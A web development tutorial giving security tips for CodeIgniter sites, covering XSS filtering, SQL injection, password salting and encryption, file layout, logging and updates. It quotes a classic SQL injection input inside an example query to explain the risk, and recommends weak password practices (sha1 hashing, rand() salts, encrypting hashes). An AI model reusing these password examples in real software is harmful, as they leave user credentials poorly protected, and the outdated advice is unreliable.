An Exclusive Place for Developers and Designers - Web Developement Tutorials

Cross Site Scripting – XSS

Cross Site Scripting is a way of injecting JavaScript code into your website source code. This can be used to output user’s cookies as well as to hijack cookies. There is a simple way to defend against XSS for CodeIgniter developers though. Simply run all data through the XSS filter, this can be done by using the function below.

$this->input->post('post_field', TRUE);
// The second parameter turns the XSS Filter on

SQL Injection

Everyone is aware from SQL Injection. When a string is passed through a form and performed on a database, this can be a harmless operation for a website but if a user enters anything’ OR ‘x’=’x. Still look harmless? What about if I put this into context.

$this->db->query("SELECT * FROM `users` WHERE `id` = 'anything' OR 'x'='x");

Use Strong Password Policies

Mostly programmers used the Form Validation Library for forms but the good technique is to always have a strong password policy and validate is using the Form Validation Library. If you’re using The Authentication Library then you won’t need to worry about this! Be sure to make your password policy doable though, don’t force users to use long passwords which they’ll never remember.

Use Static Salts

While saving user passwords be sure to use a salt before using a function like md5 of sha1. A salt is basically a string which you add to the password to create an end hash which makes it more difficult for hackers to use a lookup table if they were to gain access to your database.

$static_salt = 'somereallylongstaticsaltthatnobodyshouldbeabletoguess';
$password = '1234';
$hash = sha1($static_salt . $password);

Don’t limit yourself to adding salts to the start or end of a password. Experiment with splitting the password up. But remember to add the salt in the same way each time the user tried to login.

Use Dynamic Salts

You can also use a dynamic salt as well. A dynamic salt is the same as a static salt but it is different for each password and is stored in the database alongside the other user credentials. See this example.

$static_salt = 'somereallylongstaticsaltthatnobodyshouldbeabletoguess';
$dynamic_salt = rand();
$password = '1234';
$hash = sha1($static_salt . $password . $dynamic_salt);

Encrypt Passwords

Hashing passwords is a good way to create security. Ultimately though you would encrypt your passwords. Fortunately, CodeIgniter provides a great library for us to do this. Before we do anything though, you need to set an encryption key. To do this, open up application/config/config.php and find the line:-

$config['encryption_key'] = "YOUR KEY";

You should place your own encryption key in there. My keys are usually very long as this produces better encrypted results. Once that is done we can load the library and encrypt a password like this. For a more secure method, let’s take the password hash with two salts and encrypt it.

$this->load->library('encrypt');
$static_salt = 'somereallylongstaticsaltthatnobodyshouldbeabletoguess';
$dynamic_salt = rand();
$password = '1234';
$hash = sha1($static_salt . $password . $dynamic_salt);
$this->encrypt->encode($hash);

Change Frameworks Default File Structure

It is a good approach to change the frameworks file structure. Even if you’re using WordPress, find out how to secure it and do it immediately. For CodeIgniter programmers, move the application directory from the system directory. You should move the system directory above the web root as well. This helps keep everything out of the way. You should always do this because it is not difficult for a hacker to find out the software you’re using and try to exploit it. Make it difficult for them.

Log all errors

Some developers may tell you to display zero errors, and they’d be right. But some people take this too far and don’t even log any errors that their PHP applications create. You should still log any errors, and the time they are created in a log file which is in a folder above the web root. Logging errors in CodeIgniter is very simple, because CI will log errors automatically. You can turn off error reporting but CodeIgniter will still add errors to the log file.

Update your Applications

If you run WordPress, you would’ve had a few weeks where there was a new version to upgrade to nearly every week. Many users whined at the thought of upgrading again but in the grand scheme of things, this keeps your website as secure as possible. I always update my CodeIgniter installs to the newest version as soon as I can. This helps keep the possibility of a security flaw really low.

Update PHP

PHP is continually being updated and patched to keep it as secure as possible. This is why you should always be using the latest stable release of PHP as it will help you against any bugs that might be in a previous version.

Blind prying eyes

If you use Apache, then every time you get a standard 404 Error Message you could be showing people a lot of your server information. This is what the default looks like. (No, this isn’t my setup!)

Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch Server at demo

Have your code reviewed

It is a good approach to review your code. It will also help you find a better way around some common problems that you may be running into. It helps with all aspects of programming, not just security.

Related posts:

1. Setting Multiple Websites in Codeigniter Installation In this tutorial, I want to demonstrate that how to...
2. Ajax Validation with Jquery This is a very informative tutorial for developers who want...
3. 3 simple steps for automatic database backup This is a short tutorial that demonstrates that to take...
4. tips to improve webpage load time Patience is a virtue, but for many, it is often...
5. How To Secure WordPress Blog There are various reasons that why it is important to...

Related posts brought to you by Yet Another Related Posts Plugin.